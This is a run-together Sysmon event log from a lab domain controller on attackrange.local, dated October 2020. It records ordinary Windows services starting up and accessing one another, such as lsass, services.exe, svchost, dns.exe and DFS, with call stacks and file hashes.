10:40:09.996{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF6-5F80-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001250Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.990{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001249Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.987{733EE690-3DF7-5F80-0A00-000000007F01}852936C:\Windows\system32\services.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001248Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.985{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001247Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.973{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001246Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.973{733EE690-3DF7-5F80-0A00-000000007F01}852916C:\Windows\system32\services.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001245Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.922{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\System32\dfsrs.exe10.0.14393.2879 (rs1_release_inmarket.190313-1855)Distributed File System ReplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationdfsr.exeC:\Windows\system32\DFSRs.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=5043D2DBA1E5AC37A9874B403B48C1C1,SHA256=7044CE273B245F6D67A3BFC7D548CFF538F8FC3BD1C99467B5ADE6452C150313,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001244Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.971{733EE690-3DF7-5F80-0A00-000000007F01}852936C:\Windows\system32\services.exe{733EE690-3E09-5F80-3100-000000007F01}3064C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001243Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.964{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001242Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.964{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001241Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.964{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001240Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.962{733EE690-3DF7-5F80-0A00-000000007F01}8522580C:\Windows\system32\services.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001239Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.960{733EE690-3DF7-5F80-0A00-000000007F01}8521148C:\Windows\system32\services.exe{733EE690-3E09-5F80-3500-000000007F01}2636C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001238Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.958{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E09-5F80-3100-000000007F01}3064C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001237Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.958{733EE690-3DF7-5F80-0A00-000000007F01}8521108C:\Windows\system32\services.exe{733EE690-3E09-5F80-3100-000000007F01}3064C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001236Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.928{733EE690-3E09-5F80-3100-000000007F01}3064C:\Windows\System32\dns.exe10.0.14393.3930 (rs1_release.200901-1914)Domain Name System (DNS) ServerMicrosoft® Windows® Operating SystemMicrosoft Corporationdns.exeC:\Windows\system32\dns.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=9D6D2A8F016923E865F944F5505CAFE6,SHA256=B48220FB5B78641ACF5566E798374E9C51FED61CE0559843364E7BD664C30864,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001235Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.955{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E09-5F80-3500-000000007F01}2636C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001234Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.955{733EE690-3DF7-5F80-0A00-000000007F01}852936C:\Windows\system32\services.exe{733EE690-3E09-5F80-3500-000000007F01}2636C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001233Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.945{733EE690-3E09-5F80-3500-000000007F01}2636C:\Windows\System32\dfssvc.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Distributed File System ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdfssvc.exeC:\Windows\system32\dfssvc.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=304155A24E5273CF68197B30112D451A,SHA256=EC48F117C47F0E4BD5F7407629CE8CF78579764A7947CA05EDC089B59B941576,IMPHASH=C8B32AEEF22A97D88BD68D70385A1B30{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001232Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.950{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001231Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.949{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001230Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.949{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001229Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.949{733EE690-3DF7-5F80-0A00-000000007F01}8522580C:\Windows\system32\services.exe{733EE690-3E09-5F80-3300-000000007F01}2552C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001228Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.943{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E09-5F80-3300-000000007F01}2552C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001227Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.943{733EE690-3DF7-5F80-0A00-000000007F01}8521148C:\Windows\system32\services.exe{733EE690-3E09-5F80-3300-000000007F01}2552C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001226Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.933{733EE690-3E09-5F80-3300-000000007F01}2552C:\Program Files\Amazon\XenTools\LiteAgent.exe1.0xenagentXENIFACEAmazon Inc.xenagent.exe"C:\Program Files\Amazon\XenTools\LiteAgent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001225Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.942{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF6-5F80-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001224Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.942{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF6-5F80-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001223Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.942{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3E09-5F80-3200-000000007F01}3048C:\Windows\System32\ismserv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001222Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 